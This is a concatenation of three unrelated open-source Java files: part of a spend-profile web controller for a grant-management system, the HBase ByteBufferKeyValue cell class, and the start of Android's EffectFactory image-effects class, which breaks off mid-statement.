'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION') && hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'MARK_SPEND_PROFILE_INCOMPLETE') && hasPermission(#projectOrganisationCompositeId, 'IS_NOT_FROM_OWN_ORGANISATION')") @PostMapping("/incomplete") public String markAsActionRequiredSpendProfile(Model model, @ModelAttribute(FORM_ATTR_NAME) SpendProfileForm form, @SuppressWarnings("unused") BindingResult bindingResult, ValidationHandler validationHandler, @P("projectId")@PathVariable("projectId") final Long projectId, @P("organisationId")@PathVariable("organisationId") final Long organisationId, ProjectOrganisationCompositeId projectOrganisationCompositeId, UserResource loggedInUser) { Supplier<String> failureView = () -> reviewSpendProfilePage(model, projectId, organisationId, loggedInUser); String successView = "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile"; ServiceResult<Void> result = markSpendProfileIncomplete(projectId, organisationId); return validationHandler.addAnyErrors(result).failNowOrSucceedWith(failureView, () -> successView); } @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')") @PostMapping("/complete") public String markAsCompleteSpendProfile(Model model, @P("projectId")@PathVariable("projectId") final Long projectId, @P("organisationId")@PathVariable("organisationId") final Long organisationId, UserResource loggedInUser) { return markSpendProfileComplete(model, projectId, organisationId, "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile", loggedInUser); } @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')") @GetMapping("/confirm") public String viewConfirmSpendProfilePage(@P("projectId")@PathVariable("projectId") final Long projectId, @PathVariable("organisationId") final Long organisationId, Model model, UserResource loggedInUser) { ProjectSpendProfileViewModel viewModel = buildSpendProfileViewModel(projectId, organisationId, loggedInUser); model.addAttribute("model", viewModel); return "project/spend-profile-confirm"; } @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION') && hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'MARK_SPEND_PROFILE_INCOMPLETE') && hasPermission(#projectOrganisationCompositeId, 'IS_NOT_FROM_OWN_ORGANISATION')") @GetMapping("/incomplete") public String viewConfirmEditSpendProfilePage(@P("projectId")@PathVariable("projectId") final Long projectId, @PathVariable("organisationId") final Long organisationId, ProjectOrganisationCompositeId projectOrganisationCompositeId, Model model, UserResource loggedInUser) { ProjectSpendProfileViewModel viewModel = buildSpendProfileViewModel(projectId, organisationId, loggedInUser); model.addAttribute("model", viewModel); return "project/spend-profile-confirm-edits"; } private String doEditSpendProfile(Model model, SpendProfileForm form, final Long organisationId, final UserResource loggedInUser, ProjectResource project, SpendProfileTableResource spendProfileTableResource) { spendProfileTableResource.getMonthlyCostsPerCategoryMap().keySet().forEach(key -> { List<BigDecimal> monthlyCostNullsReplacedWithZeros = new ArrayList<>(); boolean monthlyCostNullsReplaced = false; for (BigDecimal mon : spendProfileTableResource.getMonthlyCostsPerCategoryMap().get(key)) { if (null == mon) { monthlyCostNullsReplaced = true; monthlyCostNullsReplacedWithZeros.add(BigDecimal.ZERO); } else { monthlyCostNullsReplacedWithZeros.add(mon); } } if (monthlyCostNullsReplaced) { Map<Long, List<BigDecimal>> updatedCostPerCategoryMap = spendProfileTableResource.getMonthlyCostsPerCategoryMap(); updatedCostPerCategoryMap.replace(key, monthlyCostNullsReplacedWithZeros); spendProfileTableResource.setMonthlyCostsPerCategoryMap(updatedCostPerCategoryMap); } }); form.setTable(spendProfileTableResource); model.addAttribute("model", buildSpendProfileViewModel(project, organisationId, spendProfileTableResource, loggedInUser)); return BASE_DIR + "/spend-profile"; } private String viewProjectManagerSpendProfile(Model model, final ProjectResource projectResource, final UserResource loggedInUser, final boolean isMonitoringOfficer) { model.addAttribute("model", populateSpendProfileProjectManagerViewModel(projectResource, loggedInUser, isMonitoringOfficer)); return BASE_DIR + "/" + REVIEW_TEMPLATE_NAME; } private String markSpendProfileComplete(Model model, final Long projectId, final Long organisationId, final String successView, final UserResource loggedInUser) { ServiceResult<Void> result = spendProfileService.markSpendProfileComplete(projectId, organisationId); if (result.isFailure()) { ProjectSpendProfileViewModel spendProfileViewModel = buildSpendProfileViewModel(projectId, organisationId, loggedInUser); spendProfileViewModel.setObjectErrors(Collections.singletonList(new ObjectError(SPEND_PROFILE_CANNOT_MARK_AS_COMPLETE_BECAUSE_SPEND_HIGHER_THAN_ELIGIBLE.getErrorKey(), "Cannot mark as complete, because totals more than eligible"))); model.addAttribute("model", spendProfileViewModel); return BASE_DIR + "/spend-profile"; } else { return successView; } } private ServiceResult<Void> markSpendProfileIncomplete(final Long projectId, final Long organisationId) { return spendProfileService.markSpendProfileIncomplete(projectId, organisationId); } private ProjectSpendProfileViewModel buildSpendProfileViewModel(final ProjectResource projectResource, final Long organisationId, final SpendProfileTableResource spendProfileTableResource, final UserResource loggedInUser) { OrganisationResource organisationResource = organisationRestService.getOrganisationById(organisationId).getSuccess(); CompetitionResource competition = competitionRestService.getCompetitionById(projectResource.getCompetition()).getSuccess(); SpendProfileSummaryModel summary = null; if (!competition.getFundingType().equals(LOAN)) { summary = spendProfileTableCalculator.createSpendProfileSummary(projectResource, spendProfileTableResource.getMonthlyCostsPerCategoryMap(), spendProfileTableResource.getMonths()); } boolean isUsingJesFinances = competition.applicantShouldUseJesFinances(organisationResource.getOrganisationTypeEnum()); Map<Long, BigDecimal> categoryToActualTotal = spendProfileTableCalculator.calculateRowTotal(spendProfileTableResource.getMonthlyCostsPerCategoryMap()); List<BigDecimal> totalForEachMonth = spendProfileTableCalculator.calculateMonthlyTotals(spendProfileTableResource.getMonthlyCostsPerCategoryMap(), spendProfileTableResource.getMonths().size()); BigDecimal totalOfAllActualTotals = spendProfileTableCalculator.calculateTotalOfAllActualTotals(spendProfileTableResource.getMonthlyCostsPerCategoryMap()); BigDecimal totalOfAllEligibleTotals = spendProfileTableCalculator.calculateTotalOfAllEligibleTotals(spendProfileTableResource.getEligibleCostPerCategoryMap()); boolean isUserPartOfThisOrganisation = isUserPartOfThisOrganisation(projectResource.getId(), organisationId, loggedInUser); boolean leadPartner = isUserPartOfLeadOrganisation(projectResource.getId(), loggedInUser); return new ProjectSpendProfileViewModel(projectResource, organisationResource, spendProfileTableResource, summary, spendProfileTableResource.getMarkedAsComplete(), categoryToActualTotal, totalForEachMonth, totalOfAllActualTotals, totalOfAllEligibleTotals, projectResource.getSpendProfileSubmittedDate() != null, spendProfileTableResource.getCostCategoryGroupMap(), spendProfileTableResource.getCostCategoryResourceMap(), isUsingJesFinances, isUserPartOfThisOrganisation, projectService.isProjectManager(loggedInUser.getId(), projectResource.getId()), isApproved(projectResource.getId()), leadPartner, competition.isKtp()); } private ProjectSpendProfileViewModel buildSpendProfileViewModel(final Long projectId, final Long organisationId, final UserResource loggedInUser) { ProjectResource projectResource = projectService.getById(projectId); SpendProfileTableResource spendProfileTableResource = spendProfileService.getSpendProfileTable(projectId, organisationId); return buildSpendProfileViewModel(projectResource, organisationId, spendProfileTableResource, loggedInUser); } private ProjectSpendProfileProjectSummaryViewModel populateSpendProfileProjectManagerViewModel(final ProjectResource projectResource, final UserResource loggedInUser, final boolean isMonitoringOfficer) { final OrganisationResource leadOrganisation = projectService.getLeadOrganisation(projectResource.getId()); List<OrganisationResource> organisations = new PrioritySorting<>(projectService.getPartnerOrganisationsForProject(projectResource.getId()), leadOrganisation, OrganisationResource::getName).unwrap(); Map<Long, OrganisationReviewDetails> editablePartners = getOrganisationReviewDetails(projectResource.getId(), organisations, loggedInUser); ProjectTeamStatusResource teamStatus = statusService.getProjectTeamStatus(projectResource.getId(), Optional.empty()); return new ProjectSpendProfileProjectSummaryViewModel(projectResource.getId(), projectResource.getApplication(), projectResource.getName(), organisations, leadOrganisation, projectResource.getSpendProfileSubmittedDate() != null, editablePartners, isApproved(teamStatus), isRejected(teamStatus), isMonitoringOfficer, moSpendProfileJourneyUpdateEnabled, loggedInUser); } private boolean isApproved(final Long projectId) { ProjectTeamStatusResource teamStatus = statusService.getProjectTeamStatus(projectId, Optional.empty()); return isApproved(teamStatus); } private boolean isApproved(ProjectTeamStatusResource teamStatus) { return COMPLETE.equals(teamStatus.getLeadPartnerStatus().getSpendProfileStatus()); } private boolean isRejected(ProjectTeamStatusResource teamStatus) { return LEAD_ACTION_REQUIRED.equals(teamStatus.getLeadPartnerStatus().getSpendProfileStatus()); } private Map<Long, OrganisationReviewDetails> getOrganisationReviewDetails(final Long projectId, List<OrganisationResource> partnerOrganisations, final UserResource loggedInUser) { return partnerOrganisations.stream().collect(Collectors.toMap(OrganisationResource::getId, o -> { Optional<SpendProfileResource> spendProfileResource = spendProfileService.getSpendProfile(projectId, o.getId()); return new OrganisationReviewDetails(o.getId(), o.getName(), spendProfileResource.map(SpendProfileResource::isMarkedAsComplete).orElse(false), isUserPartOfThisOrganisation(projectId, o.getId(), loggedInUser), true, spendProfileResource.map(SpendProfileResource::getReviewedBy).orElse(null), spendProfileResource.map(SpendProfileResource::getReviewedOn).orElse(null)); }, (v1, v2) -> v1, LinkedHashMap::new)); } private boolean isUserPartOfThisOrganisation(final Long projectId, final Long organisationId, final UserResource loggedInUser) { List<ProjectUserResource> projectUsers = projectService.getProjectUsersForProject(projectId); Optional<ProjectUserResource> returnedProjectUser = simpleFindFirst(projectUsers, projectUserResource -> projectUserResource.getUser().equals(loggedInUser.getId()) && projectUserResource.getOrganisation().equals(organisationId) && ProjectParticipantRole.PROJECT_PARTNER == projectUserResource.getRole() ); return returnedProjectUser.isPresent(); } private boolean isUserPartOfLeadOrganisation(final Long projectId, final UserResource loggedInUser) { return projectService.getLeadPartners(projectId).stream().anyMatch(pu -> pu.isUser(loggedInUser.getId())); } }
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase; import java.io.IOException; import java.io.OutputStream; import java.nio.ByteBuffer; import org.apache.hadoop.hbase.util.ByteBufferUtils; import org.apache.hadoop.hbase.util.Bytes; import org.apache.hadoop.hbase.util.ClassSize; import org.apache.yetus.audience.InterfaceAudience; import org.apache.hbase.thirdparty.com.google.common.annotations.VisibleForTesting; /** * This Cell is an implementation of {@link ByteBufferExtendedCell} where the data resides in * off heap/ on heap ByteBuffer */ @InterfaceAudience.Private public class ByteBufferKeyValue extends ByteBufferExtendedCell { protected final ByteBuffer buf; protected final int offset; protected final int length; private long seqId = 0; public static final int FIXED_OVERHEAD = ClassSize.OBJECT + ClassSize.REFERENCE + (2 * Bytes.SIZEOF_INT) + Bytes.SIZEOF_LONG; public ByteBufferKeyValue(ByteBuffer buf, int offset, int length, long seqId) { this.buf = buf; this.offset = offset; this.length = length; this.seqId = seqId; } public ByteBufferKeyValue(ByteBuffer buf, int offset, int length) { this.buf = buf; this.offset = offset; this.length = length; } @VisibleForTesting public ByteBuffer getBuffer() { return this.buf; } @VisibleForTesting public int getOffset() { return this.offset; } @Override public byte[] getRowArray() { return CellUtil.cloneRow(this); } @Override public int getRowOffset() { return 0; } @Override public short getRowLength() { return ByteBufferUtils.toShort(this.buf, this.offset + KeyValue.ROW_OFFSET); } @Override public byte[] getFamilyArray() { return CellUtil.cloneFamily(this); } @Override public int getFamilyOffset() { return 0; } @Override public byte getFamilyLength() { return getFamilyLength(getFamilyLengthPosition()); } int getFamilyLengthPosition() { return getFamilyLengthPosition(getRowLength()); } int getFamilyLengthPosition(int rowLength) { return this.offset + KeyValue.ROW_KEY_OFFSET + rowLength; } byte getFamilyLength(int famLenPos) { return ByteBufferUtils.toByte(this.buf, famLenPos); } @Override public byte[] getQualifierArray() { return CellUtil.cloneQualifier(this); } @Override public int getQualifierOffset() { return 0; } @Override public int getQualifierLength() { return getQualifierLength(getKeyLength(), getRowLength(), getFamilyLength()); } int getQualifierLength(int keyLength, int rlength, int flength) { return keyLength - (int) KeyValue.getKeyDataStructureSize(rlength, flength, 0); } @Override public long getTimestamp() { return getTimestamp(getKeyLength()); } long getTimestamp(int keyLength) { int offset = getTimestampOffset(keyLength); return ByteBufferUtils.toLong(this.buf, offset); } int getKeyLength() { return ByteBufferUtils.toInt(this.buf, this.offset); } private int getTimestampOffset(int keyLen) { return this.offset + KeyValue.ROW_OFFSET + keyLen - KeyValue.TIMESTAMP_TYPE_SIZE; } @Override public byte getTypeByte() { return getTypeByte(getKeyLength()); } byte getTypeByte(int keyLen) { return ByteBufferUtils.toByte(this.buf, this.offset + keyLen - 1 + KeyValue.ROW_OFFSET); } @Override public long getSequenceId() { return this.seqId; } @Override public void setSequenceId(long seqId) { this.seqId = seqId; } @Override public byte[] getValueArray() { return CellUtil.cloneValue(this); } @Override public int getValueOffset() { return 0; } @Override public int getValueLength() { return ByteBufferUtils.toInt(this.buf, this.offset + Bytes.SIZEOF_INT); } @Override public byte[] getTagsArray() { return CellUtil.cloneTags(this); } @Override public int getTagsOffset() { return 0; } @Override public int getTagsLength() { int tagsLen = this.length - (getKeyLength() + getValueLength() + KeyValue.KEYVALUE_INFRASTRUCTURE_SIZE); if (tagsLen > 0) { // There are some Tag bytes in the byte[]. So reduce 2 bytes which is // added to denote the tags // length tagsLen -= KeyValue.TAGS_LENGTH_SIZE; } return tagsLen; } @Override public ByteBuffer getRowByteBuffer() { return this.buf; } @Override public int getRowPosition() { return this.offset + KeyValue.ROW_KEY_OFFSET; } @Override public ByteBuffer getFamilyByteBuffer() { return this.buf; } @Override public int getFamilyPosition() { return getFamilyPosition(getFamilyLengthPosition()); } public int getFamilyPosition(int familyLengthPosition) { return familyLengthPosition + Bytes.SIZEOF_BYTE; } @Override public ByteBuffer getQualifierByteBuffer() { return this.buf; } @Override public int getQualifierPosition() { return getQualifierPosition(getFamilyPosition(), getFamilyLength()); } int getQualifierPosition(int familyPosition, int familyLength) { return familyPosition + familyLength; } @Override public ByteBuffer getValueByteBuffer() { return this.buf; } @Override public int getValuePosition() { return this.offset + KeyValue.ROW_OFFSET + getKeyLength(); } @Override public ByteBuffer getTagsByteBuffer() { return this.buf; } @Override public int getTagsPosition() { int tagsLen = getTagsLength(); if (tagsLen == 0) { return this.offset + this.length; } return this.offset + this.length - tagsLen; } @Override public long heapSize() { if (this.buf.hasArray()) { return ClassSize.align(FIXED_OVERHEAD + length); } return ClassSize.align(FIXED_OVERHEAD) + this.getSerializedSize(); } @Override public int write(OutputStream out, boolean withTags) throws IOException { int length = getSerializedSize(withTags); ByteBufferUtils.copyBufferToStream(out, this.buf, this.offset, length); return length; } @Override public int getSerializedSize(boolean withTags) { if (withTags) { return this.length; } return getKeyLength() + this.getValueLength() + KeyValue.KEYVALUE_INFRASTRUCTURE_SIZE; } @Override public int getSerializedSize() { return this.length; } @Override public void write(ByteBuffer buf, int offset) { ByteBufferUtils.copyFromBufferToBuffer(this.buf, buf, this.offset, offset, this.length); } @Override public String toString() { return CellUtil.toString(this, true); } @Override public void setTimestamp(long ts) throws IOException { ByteBufferUtils.copyFromArrayToBuffer(this.buf, this.getTimestampOffset(), Bytes.toBytes(ts), 0, Bytes.SIZEOF_LONG); } private int getTimestampOffset() { return this.offset + KeyValue.KEYVALUE_INFRASTRUCTURE_SIZE + getKeyLength() - KeyValue.TIMESTAMP_TYPE_SIZE; } @Override public void setTimestamp(byte[] ts) throws IOException { ByteBufferUtils.copyFromArrayToBuffer(this.buf, this.getTimestampOffset(), ts, 0, Bytes.SIZEOF_LONG); } @Override public ExtendedCell deepClone() { byte[] copy = new byte[this.length]; ByteBufferUtils.copyFromBufferToArray(copy, this.buf, this.offset, 0, this.length); KeyValue kv = new KeyValue(copy, 0, copy.length); kv.setSequenceId(this.getSequenceId()); return kv; } /** * Needed doing 'contains' on List. Only compares the key portion, not the value. */ @Override public boolean equals(Object other) { if (!(other instanceof Cell)) { return false; } return CellUtil.equals(this, (Cell) other); } /** * In line with {@link #equals(Object)}, only uses the key portion, not the value. */ @Override public int hashCode() { return calculateHashForKey(this); } private int calculateHashForKey(ByteBufferExtendedCell cell) { int rowHash = ByteBufferUtils.hashCode(cell.getRowByteBuffer(), cell.getRowPosition(), cell.getRowLength()); int familyHash = ByteBufferUtils.hashCode(cell.getFamilyByteBuffer(), cell.getFamilyPosition(), cell.getFamilyLength()); int qualifierHash = ByteBufferUtils.hashCode(cell.getQualifierByteBuffer(), cell.getQualifierPosition(), cell.getQualifierLength()); int hash = 31 * rowHash + familyHash; hash = 31 * hash + qualifierHash; hash = 31 * hash + (int) cell.getTimestamp(); hash = 31 * hash + cell.getTypeByte(); return hash; } }
/* * Copyright (C) 2011 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package android.media.effect; import java.lang.reflect.Constructor; /** * <p>The EffectFactory class defines the list of available Effects, and provides functionality to * inspect and instantiate them. Some effects may not be available on all platforms, so before * creating a certain effect, the application should confirm that the effect is supported on this * platform by calling {@link #isEffectSupported(String)}.</p> */ public class EffectFactory { private EffectContext mEffectContext; private final static String[] EFFECT_PACKAGES = { "android.media.effect.effects.", // Default effect package "" // Allows specifying full class path }; /** List of Effects */ /** * <p>Copies the input texture to the output.</p> * <p>Available parameters: None</p> * @hide */ public final static String EFFECT_IDENTITY = "IdentityEffect"; /** * <p>Adjusts the brightness of the image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>brightness</code></td> * <td>The brightness multiplier.</td> * <td>Positive float. 1.0 means no change; larger values will increase brightness.</td> * </tr> * </table> */ public final static String EFFECT_BRIGHTNESS = "android.media.effect.effects.BrightnessEffect"; /** * <p>Adjusts the contrast of the image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>contrast</code></td> * <td>The contrast multiplier.</td> * <td>Float. 1.0 means no change; larger values will increase contrast.</td> * </tr> * </table> */ public final static String EFFECT_CONTRAST = "android.media.effect.effects.ContrastEffect"; /** * <p>Applies a fisheye lens distortion to the image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>scale</code></td> * <td>The scale of the distortion.</td> * <td>Float, between 0 and 1. Zero means no distortion.</td> * </tr> * </table> */ public final static String EFFECT_FISHEYE = "android.media.effect.effects.FisheyeEffect"; /** * <p>Replaces the background of the input frames with frames from a * selected video. Requires an initial learning period with only the * background visible before the effect becomes active. The effect will wait * until it does not see any motion in the scene before learning the * background and starting the effect.</p> * * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>source</code></td> * <td>A URI for the background video to use. This parameter must be * supplied before calling apply() for the first time.</td> * <td>String, such as from * {@link android.net.Uri#toString Uri.toString()}</td> * </tr> * </table> * * <p>If the update listener is set for this effect using * {@link Effect#setUpdateListener}, it will be called when the effect has * finished learning the background, with a null value for the info * parameter.</p> */ public final static String EFFECT_BACKDROPPER = "android.media.effect.effects.BackDropperEffect"; /** * <p>Attempts to auto-fix the image based on histogram equalization.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>scale</code></td> * <td>The scale of the adjustment.</td> * <td>Float, between 0 and 1. Zero means no adjustment, while 1 indicates the maximum * amount of adjustment.</td> * </tr> * </table> */ public final static String EFFECT_AUTOFIX = "android.media.effect.effects.AutoFixEffect"; /** * <p>Adjusts the range of minimal and maximal color pixel intensities.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>black</code></td> * <td>The value of the minimal pixel.</td> * <td>Float, between 0 and 1.</td> * </tr> * <tr><td><code>white</code></td> * <td>The value of the maximal pixel.</td> * <td>Float, between 0 and 1.</td> * </tr> * </table> */ public final static String EFFECT_BLACKWHITE = "android.media.effect.effects.BlackWhiteEffect"; /** * <p>Crops an upright rectangular area from the image. If the crop region falls outside of * the image bounds, the results are undefined.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>xorigin</code></td> * <td>The origin's x-value.</td> * <td>Integer, between 0 and width of the image.</td> * </tr> * <tr><td><code>yorigin</code></td> * <td>The origin's y-value.</td> * <td>Integer, between 0 and height of the image.</td> * </tr> * <tr><td><code>width</code></td> * <td>The width of the cropped image.</td> * <td>Integer, between 1 and the width of the image minus xorigin.</td> * </tr> * <tr><td><code>height</code></td> * <td>The height of the cropped image.</td> * <td>Integer, between 1 and the height of the image minus yorigin.</td> * </tr> * </table> */ public final static String EFFECT_CROP = "android.media.effect.effects.CropEffect"; /** * <p>Applies a cross process effect on image, in which the red and green channels are * enhanced while the blue channel is restricted.</p> * <p>Available parameters: None</p> */ public final static String EFFECT_CROSSPROCESS = "android.media.effect.effects.CrossProcessEffect"; /** * <p>Applies black and white documentary style effect on image..</p> * <p>Available parameters: None</p> */ public final static String EFFECT_DOCUMENTARY = "android.media.effect.effects.DocumentaryEffect"; /** * <p>Overlays a bitmap (with premultiplied alpha channel) onto the input image. The bitmap * is stretched to fit the input image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>bitmap</code></td> * <td>The overlay bitmap.</td> * <td>A non-null Bitmap instance.</td> * </tr> * </table> */ public final static String EFFECT_BITMAPOVERLAY = "android.media.effect.effects.BitmapOverlayEffect"; /** * <p>Representation of photo using only two color tones.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>first_color</code></td> * <td>The first color tone.</td> * <td>Integer, representing an ARGB color with 8 bits per channel. May be created using * {@link android.graphics.Color Color} class.</td> * </tr> * <tr><td><code>second_color</code></td> * <td>The second color tone.</td> * <td>Integer, representing an ARGB color with 8 bits per channel. May be created using * {@link android.graphics.Color Color} class.</td> * </tr> * </table> */ public final static String EFFECT_DUOTONE = "android.media.effect.effects.DuotoneEffect"; /** * <p>Applies back-light filling to the image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>strength</code></td> * <td>The strength of the backlight.</td> * <td>Float, between 0 and 1. Zero means no change.</td> * </tr> * </table> */ public final static String EFFECT_FILLLIGHT = "android.media.effect.effects.FillLightEffect"; /** * <p>Flips image vertically and/or horizontally.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>vertical</code></td> * <td>Whether to flip image vertically.</td> * <td>Boolean</td> * </tr> * <tr><td><code>horizontal</code></td> * <td>Whether to flip image horizontally.</td> * <td>Boolean</td> * </tr> * </table> */ public final static String EFFECT_FLIP = "android.media.effect.effects.FlipEffect"; /** * <p>Applies film grain effect to image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>strength</code></td> * <td>The strength of the grain effect.</td> * <td>Float, between 0 and 1. Zero means no change.</td> * </tr> * </table> */ public final static String EFFECT_GRAIN = "android.media.effect.effects.GrainEffect"; /** * <p>Converts image to grayscale.</p> * <p>Available parameters: None</p> */ public final static String EFFECT_GRAYSCALE = "android.media.effect.effects.GrayscaleEffect"; /** * <p>Applies lomo-camera style effect to image.</p> * <p>Available parameters: None</p> */ public final static String EFFECT_LOMOISH = "android.media.effect.effects.LomoishEffect"; /** * <p>Inverts the image colors.</p> * <p>Available parameters: None</p> */ public final static String EFFECT_NEGATIVE = "android.media.effect.effects.NegativeEffect"; /** * <p>Applies posterization effect to image.</p> * <p>Available parameters: None</p> */ public final static String EFFECT_POSTERIZE = "android.media.effect.effects.PosterizeEffect"; /** * <p>Removes red eyes on specified region.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>centers</code></td> * <td>Multiple center points (x, y) of the red eye regions.</td> * <td>An array of floats, where (f[2*i], f[2*i+1]) specifies the center of the i'th eye. * Coordinate values are expected to be normalized between 0 and 1.</td> * </tr> * </table> */ public final static String EFFECT_REDEYE = "android.media.effect.effects.RedEyeEffect"; /** * <p>Rotates the image. The output frame size must be able to fit the rotated version of * the input image. Note that the rotation snaps to a the closest multiple of 90 degrees.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>angle</code></td> * <td>The angle of rotation in degrees.</td> * <td>Integer value. This will be rounded to the nearest multiple of 90.</td> * </tr> * </table> */ public final static String EFFECT_ROTATE = "android.media.effect.effects.RotateEffect"; /** * <p>Adjusts color saturation of image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>scale</code></td> * <td>The scale of color saturation.</td> * <td>Float, between -1 and 1. 0 means no change, while -1 indicates full desaturation, * i.e. grayscale.</td> * </tr> * </table> */ public final static String EFFECT_SATURATE = "android.media.effect.effects.SaturateEffect"; /** * <p>Converts image to sepia tone.</p> * <p>Available parameters: None</p> */ public final static String EFFECT_SEPIA = "android.media.effect.effects.SepiaEffect"; /** * <p>Sharpens the image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>scale</code></td> * <td>The degree of sharpening.</td> * <td>Float, between 0 and 1. 0 means no change.</td> * </tr> * </table> */ public final static String EFFECT_SHARPEN = "android.media.effect.effects.SharpenEffect"; /** * <p>Rotates the image according to the specified angle, and crops the image so that no * non-image portions are visible.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>angle</code></td> * <td>The angle of rotation.</td> * <td>Float, between -45 and +45.</td> * </tr> * </table> */ public final static String EFFECT_STRAIGHTEN = "android.media.effect.effects.StraightenEffect"; /** * <p>Adjusts color temperature of the image.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>scale</code></td> * <td>The value of color temperature.</td> * <td>Float, between 0 and 1, with 0 indicating cool, and 1 indicating warm. A value of * of 0.5 indicates no change.</td> * </tr> * </table> */ public final static String EFFECT_TEMPERATURE = "android.media.effect.effects.ColorTemperatureEffect"; /** * <p>Tints the photo with specified color.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>tint</code></td> * <td>The color of the tint.</td> * <td>Integer, representing an ARGB color with 8 bits per channel. May be created using * {@link android.graphics.Color Color} class.</td> * </tr> * </table> */ public final static String EFFECT_TINT = "android.media.effect.effects.TintEffect"; /** * <p>Adds a vignette effect to image, i.e. fades away the outer image edges.</p> * <p>Available parameters:</p> * <table> * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr> * <tr><td><code>scale</code></td> * <td>The scale of vignetting.</td> * <td>Float, between 0 and 1. 0 means no change.</td> * </tr> * </table> */ public final static String EFFECT_VIGNETTE = "android.media.effect.effects.VignetteEffect"; EffectFactory(EffectContext effectContext) { mEffectContext = effectContext; } /** * Instantiate a new effect with the given effect name. * * <p>The effect's parameters will be set to their default values.</p> * * <p>Note that the EGL context associated with the current EffectContext need not be made * current when creating an effect. This allows the host application to instantiate effects * before any EGL context has become current.</p> * * @param effectName The name of the effect to create. * @return A new Effect instance. * @throws IllegalArgumentException if the effect with the specified name is not supported or * not known. */ public Effect createEffect(String effectName) { Class effectClass = getEffectClassByName(effectName); if (effectClass == null) { throw new IllegalArgumentException("Cannot instantiate unknown effect '" + effectName + "'!"); } return instantiateEffect(effectClass, effectName); } /** * Check if an effect is supported on this platform. * * <p>Some effects may only be available on certain platforms. Use this method before * instantiating an effect to make sure it is supported.</p> * * @param effectName The name of the effect. * @return true, if the effect is supported on this platform. * @throws IllegalArgumentException if the effect name is not known. */ public static boolean isEffectSupported(String effectName) { return getEffectClassByName(effectName) != null; } private static Class getEffectClassByName(String className) { Class effectClass = null; // Get context's classloader; otherwise cannot load non-framework effects ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader(); // Look for the class in the imported packages for (String packageName : EFFECT_PACKAGES) { try { effectClass = contextClassLoader.loadClass(packageName + className); } catch (ClassNotFoundException e) { continue; } // Exit loop if class was found. if (effectClass != null) { break; } } return effectClass; } private Effect instantiateEffect(Class effectClass, String name) { // Make sure this is an Effect subclass try { effectClass.asSubclass(Effect.class); } catch (ClassCastException e) { throw new IllegalArgumentException("Attempting to allocate effect '" + effectClass + "' which is not a subclass of Effect!", e); } // Look for the correct constructor Constructor effectConstructor = null; try { effectConstructor = effectClass.getConstructor(EffectContext.class, String.class); } catch (NoSuchMethodException e) { throw new 